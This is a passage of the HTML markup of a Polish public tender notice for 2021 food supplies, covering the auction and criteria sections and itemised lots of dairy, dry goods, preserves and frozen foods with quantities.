Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Umowa może zostać przedłużona aneksem, (nie dotyczy umowy na część 7 i 8) jednak na okres nie dłuższy niż o jeden miesiąc, przy zachowaniu poniższych warunków: - ilości zakupionych artykułów będą nie większe niż 1/12 całości artykułów umowy. - kwota należności za zakupione artykuły będzie nie wyższa niż 1/12 należności umownej. - pozostałe warunki umowy bez zmian.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-12-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Mleko i jego przetwory w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Jogurt naturalny op. 150 g. o zawartości tłuszczu 0%-2% w 100g jogurtu, gęsty. szt	1734Jogurt owocowy op.150 g.o zawartości tłuszczu 0% -2 % w 100g jogurtu, smak truskawkowy, brzoskwiniowy, malinowy, z owoców leśnych, ananasowy, gęsty, z widocznymi kawałkami owoców (zawartość owoców min.3,5%). szt	3700Kefir op. do 1 l. o zawartości tłuszczu 2% w 100g kefiru.	l	180Margaryna Palma a 250 g. o zawartości tłuszczu 80%	kg	165Masło ekstra, z zawartością tłuszczu zwierzęcego (mlekowego), nie mniej niż 82%, z zawartością wody poniżej 17%, niesłone (nie więcej niż 2% soli) - w 100g masła. Nie posiadające tłuszczów innego pochodzenia (np. oleje, margaryny), o stałej konsystencji.Pakowane w kostki 200g	kg	1530Maślanka naturalna opak do 1 l. zawartość tłuszczu 2%	l	80Maślanka owocowa jagodowa, truskawkowa, brzoskwiniowa op. do 1 l	l	200Mleko krowie o zawartości tłuszczu 2% w litrze mleka, pakowane w worki foliowe do10 l, worki nieuszkodzone, czyste. l	18 300Mleko w proszku op.do 0,5kg spożywcze, krowie,pełne, niegranulowane.	kg	10Mleko zagęszczone niesłodzone opakowanie 0,5 l l	60Ser biały półtłusty , niekwaśny, o zawartości tłuszczu 4% w 100g sera	kg	1520Ser topiony o zawartości tłuszczu nie mniej niż 20% w 100g suchej masy. Smaki: naturalny, oraz z dodatkami: szynki, papryki, szczypiorku, pieczarek. Waga 1szt - 100g.	kg	42Ser żółty Gouda lub Edamski posiadający nie mniej niż 27 gram tłuszczu zwierzęcego ( mlekowego) w 100 gram sera, nieposiadający tłuszczów innego pochodzenia (np.oleje, margaryny), kawałki o wadze 3-4 kg, nie łamiący się	kg	115Serek Bieluch lub równoważny opak.100 gram, o zawartości tłuszczu nie mniej niż 3 gram, węglowodanów 4,5 gram, białka 9 gram - w 100 gramach serka.	kg	50Serek do chleba op. do 100 g śmietankowy, z ziołami, ze szczypiorkiem, z czosnkiem, z ogórkiem i koperkiem, z papryką, z chrzanem o zawartości tłuszczu nie mniej niż 15 gram, węglowodanów 3 gram , białka 5 gram- w 100 gramach serka.	kg	230Serek fromage a 100 g , naturalny, o smaku: śmietankowym, czosnkowym, chrzanowym, warzywnym.	kg	60Serek grani ziarnisty op. do 200 g , widoczne granulki sera, oddzielające się od śmietanki, o zawartości tłuszczu 3-5% w 100g serka. kg	430Serek homo naturalny op. do 200 g o zawartości tłuszczu 3 - 7 % w 100g serka.	kg	85Serek homo owocowy op. do 200 g o zawartości tłuszczu 3 - 7 % w 100g serka.	kg	140Serek kanapkowy naturalny, ze szczypiorkiem, z czosnkiem, z papryką op. do 150 g o zawartości tłuszczu nie mniej niż 14 gram, węglowodanów 6 gram , białka 6 gram- w 100 gramach serka.	kg	25Serek Ostrowia lub równoważny mix.op 120 g o zawartości tłuszczu 23 g., białka5 g, węglowodanów 4 g- w 100 gramach serka	kg	350Śmietana opakowanie twarde do 5 l. o zawartości tłuszczu 18% w litrze śmietany, homogenizowana, słodka, bez grudek	l	1500<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2022-01-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Artykuły spożywcze sypkie i inne w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Andruty wafle cukrzycowe opak do 110 kg	55 g. Budyń bez cukru opak.do 1 kg., smak śmietankowy, waniliowy, czekoladowy, malinowy.	kg	130Bulion drobiowy Winiary	kg	3Chrupki krakowskie a 350g.	kg	500Ciastka deserowe nadziewane lub w czekoladzie , których termin przydatności do spożycia wynosi minimum 14 dni a maksymalnie 45 dni od daty produkcji	kg	175Ciastka herbatniki szkolne	kg	30Ciastka Krakersy Lajkonik lub równoważne o wartości energetycznej 476 kcal,21gram tłuszczu, 62 gramy węglowodanów na 100gram krakersów opakowanie 180 g	kg	45Ciastka typu Grześki w czekoladzie a 36g. kg	65Cukier opak do 1 kg.	kg	2300Cukier puder opak.do 0,5 kg	kg	140Cukier waniliowy opak do 1 kg.	kg	11Cukierki w czekoladzie- mieszanka krakowska	kg	24Cynamon opak do 1 kg.	kg	1Czekolada dla diabetyków opak.do 100 g	kg	24,5Czosnek granulowany opak do 1 kg.	kg	25Drożdże piekarskie opak.do 100 g.	kg	9Galaretka owocowa opakowanie do1kg, smak: truskawkowa, wiśniowa, agrestowa, brzoskwiniowa i cytrynowa, o zawartości żelatyny wieprzowej.	kg	160Herbata ekspresowa owocowa (ze sznureczkiem) różne smaki Vitax op.-20 szt.	op.	400Herbata liściasta Madras opak.do 1 kg.	kg	150Kakao Wawel lub równoważne opakowanie = 100g, sypkie, bez cukru, ekstra , ciemne, niskotłuszczowe o zaw. 10 – 12% w100g suchej masy	kg	12Kasza jęczmienna sypka, średnia, pakowana w torebki 1kg kg	170Kasza manna sypka, pakowana w torebki 1kg	kg	180Kawa zbożowa Kujawianka lub równoważna opak do 0,5 kg., składniki: żyto prażone 60%, jęczmień 20%, cykoria, burak prażony kg	145Ketchup Roleski lub równoważny- łagodny, opakowanie plastik do 500g, gęsty, produkowany z pomidorów( 205 gram pomidorów w 100 gram ketchupu) , o intensywnej, czerwonej barwie, bez konserwantów,zagęstników i dodatków "E"	l	85Ketchup Roleski lub równoważny -pikantny, opakowanie plastik do 500g, gęsty, produkowany z pomidorów( 205 gram pomidorów w 100 gram ketchupu) , o intensywnej, czerwonej barwie, bez konserwantów,zagęstników i dodatków "E"	l	86Kisiel bez cukru opak.do 1 kg. smak: malinowy, morelowy, wiśniowy,truskawkowy i cytrynowy. kg.	120Kleik ryżowy Bobovita lub równoważny błyskawiczny zawierający 99,9% mąki ryżowej,opak do 200 g.	kg	4Kminek opak do 1 kg.	kg	1,5Konserwa rybna-śledź w oleju opak. 300 g.-330 gram, zawartość śledzia minimum 55% w 100 gramach produktu	kg	40Konserwa rybna-śledź w pomidorach opak. 300 g.-330 gram zawartość śledzia minimum 55% w 100 gramach produktu	kg	40Kwasek cytrynowy opak.do 1 kg.	kg	15,5Liść laurowy opak. Do 1 kg	kg	0,5Majeranek opak do 0,2 kg.	kg	2Majonez Roleski lub równoważny opak. do 1 kg ,stołowy o zawartości tłuszczu nie mniej niż 51% i jaj kurzych nie mniej niż 11% w 100g majonezu, bez konserwantów, gęsty, barwa kremowa kg	330Makaron drobny 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	l	300Makaron nitki 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	150Makaron Łazanki 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	70Makaron różny 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	315Makrela wędzona	kg	155Mąka pszenna tortowa typ 450 , pakowana w torebki 1kg sypka, barwa jasno kremowa.	kg	2 450Mąka ziemniaczana opak do 1 kg.	kg	150Miód naturalny wielokwiatowy , płynny opak.do 400g.	kg	80Musztarda delikatesowa Roleski lub równoważna opak do 0,5 kg.bez konserwantów,zagęstników, stabilizatorów i dodatków "E"	kg	65Ocet 10% opak do 0,5 l	l	30Olej butelka do1litra, roślinny, z pierwszego tłoczenia, o niskiej zawartości kwasu eurukowego, nadający się do pieczenia i smażenia.	l	450Oregano opak do 50 g.	kg	0,2Paluszki słone Lajkonik lub równoważne , mające 374 kcal w 100 gramach paluszków opak.do 300 g.	kg	170Pieprz naturalny czarny mielony 100% opak do 1 kg, w składzie tylko pieprz, bez innych dodatków.	kg	32Płatki kukurydziane bez dodatków smakowych Corn Flakes opak.do 1 kg.	kg	95Płatki owsiane górskie ,barwa swoista dla produktu, pakowane w torebki od 0,50 kg - 1kg, klasa I	kg	120Proszek do pieczenia opak do 50 g.	kg	4,5Przyprawa do kurczaka złocista Kamis lub równoważna opak do 1 kg., o zawartości : sól, papryka słodka 14%,gorczyca biała, czosnek-5,8%,, kolendra, kurkuma, kozieradka-2,4%, chili-2% imbir, cynamon, kmin, goździki, gałka muszkatałowa.	kg	4Przyprawa do mięsa Kamis lub równoważna opak do 1 kg. o zawartości:sól, czosnek, gorczyca, kminek,kolendra, papryka słodka, majeranek, cząber, rozmaryn, chili.	kg	0,5Przyprawa do potraw "Kucharek" lub równoważna , o zawartości minimum 15, 5% suszonych warzyw. opak do 1 kg.,	kg	75Przyprawa w płynie do zup Winiary a 1l.	l	188Rodzynki opakowanie od 0,50kg do 1kg, owoc średniej wielkości, typu sułtańskie	kg	35Ryż barwa biała, długo ziarnisty, pakowany w torebki 1kg, klasa I	kg	320Sól kuchenna jodowana opak do 1 kg.	kg	670Śledzie solone Matias opak 3kg.po odcieku 2 kg.	kg	170Śledzie solone Matias opak 5kg.po odcieku 4 kg.	kg	170Śliwki suszone bez pestek opak do 250 g.	kg	8,5Śmietana śnieżka opak do 60 g.	kg	30Wiórka kokosowe opak do 100 g.	kg	22Ziele angielskie opak do 1 kg.	kg	4,5Żelatyna wieprzowa opakowanie do 1 kg.	kg	25Soda oczyszczona	kg	0,6<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Przetwory owocowe i warzywne w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Barszcz biały op. do 0,5 l butelka , kiszony, z mąki żytniej;	l	169Barszcz czerwony koncentrat Krakus lub równoważny op do 0,3 l. zawierający zagęszczony sok z buraków czerwonych 59,2%	l	45Brzoskwinie w syropie a 850g w puszce, op. 0,850-1 kg, bez pestek, krojone w połówki	szt	35Chrzan tarty Polonaise lub równoważny op. do 200 g. min. 62% chrzanu,102 kcal, tłuszcz 07 g, białko 2,7 g na 100g produktu	kg	120Dżem bez cukru op. do 400 g.z kawałkami owoców, różne smaki, bez konserwantów, sporządzony z min 40% owoców na 100g produktu	kg	400Groszek konserwowy op. do 400 g. z otwieraczem, sałatkowy, średnie ziarna	kg	175Koncentrat pomidorowy 28-30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, min.104 kcal., tłuszcz 0,8 g., węglowodany18 g na 100 g produktu, PUDLISZKI lub równoważny opakowanie do 1 kgpasteryzowany, bez konserwantów 28- 30% Pudliszki op.do 1 kg kg	205Koncentrat pomidorowy 28-30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, min.104 kcal., tłuszcz 0,8 g., węglowodany18 g na 100 g produktu, PUDLISZKI lub równoważny opakowanie do 200 g.pasteryzowany, bez konserwantów 28- 30% Pudliszki op.do 1 kg kg	50Kukurydza konserwowa op. do 400 g. z otwieraczem, sałatkowa, półsłodka	kg	200Marmolada owocowa twarda o smaku różanym op. do 1 kg	kg	45Nektar czarna porzeczka zaw. sok z czarnych porzeczek z zagęszczonego soku min.(25%) , zaw. w 100 ml 49 kcal,wit. C 6 mg. TYMBARK lub równoważny a 1 l.	l	200Papryka konserwowa czerwona półsłodka op. do 1 lit.	kg	380Pieczarki marynowane op. do 1 lit. grzyby całe w zalewie octowej	kg	190Powidło śliwkowe	kg	30Sałatka szwedzka op. do 1 lit.	kg	430Sałatka z czerwonej kapusty z dod. jabłka o smaku łagodnym op. do 1 lit.	kg	40Sok jabłkowy 100 % z zagęszczonego soku jabłkowego zaw. w 100 ml. 43 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.	l	300Sok multiwitamina z zagęszczonych soków z: jabłek (60%) i pomarańczy (22%), sok z marchwi z zagęszczonego soku (12%), przeciery z: bananów (3%), brzoskwiń, gujawy i papai, soki z zagęszczonych soków z: ananasów (2%), mango (0,5%), marakui (0,1%), liczi (0,05%), figi kaktusowej, kiwi i limonek,zaw. w 100 ml.51 kcal, wit. C-12 mg. - TYMBARK lub równoważny opak.1 l.	l	300Sok pomarańczowy 100 % z zagęszczonego soku pomarańczowego zaw. w 100 ml. 45 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.	l	400Sok pomarańczowy 100 % z zagęszczonego soku pomarańczowego zaw. w 100 ml. 45 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 200 ml.	l	40Syrop o smaku malinowym, wysokosłodzony, pasteryzowany,bez substancji konserwujących zaw. min.3% zagęszczonego soku malinowego	l	100<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Mrożonki w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Brokuły różyczki, paczkowane 2- 2,5 kg	kg	85Brukselka mrożona opak.do 2,5 kg	kg	95Fasola szparagowa mrożona zielona opak.do 2,5 kg	kg	105Fasola szparagowa mrożona żółta opak.do 2,5 kg	kg	105Filet z mintaja mrożony metodą „Shatter pack”, bez glazury (filety układane warstwami, oddzielone foliowymi przekładkami). barwa fileta biała, bez skóry.	kg	120Borówki mrożone opak.do 2,5 kg	kg	100Filet z morszczuka mrożony metodą „Shatter pack”,,bez glazury (filety układane warstwami, oddzielone foliowymi przekładkami), barwa fileta biała, bez skóry. kg	355Groszek zielony mrożony opak.do 2,5 kg.	kg	110Kalafior mrożony różyczki, paczkowane 2- 2,5 kg	kg	300Mieszanka kompotowa mrożona 5-cio składnikowa opakowanie do 10 kg	kg	2550Szpinak mrożony mielony opak. do 2,5 kg.	kg	220Śliwy bez pestek mrożone opak.do 2,5 kg	kg	120Truskawki mrożone opak.do 2,5 kg.	kg	220<br/><b> 2) 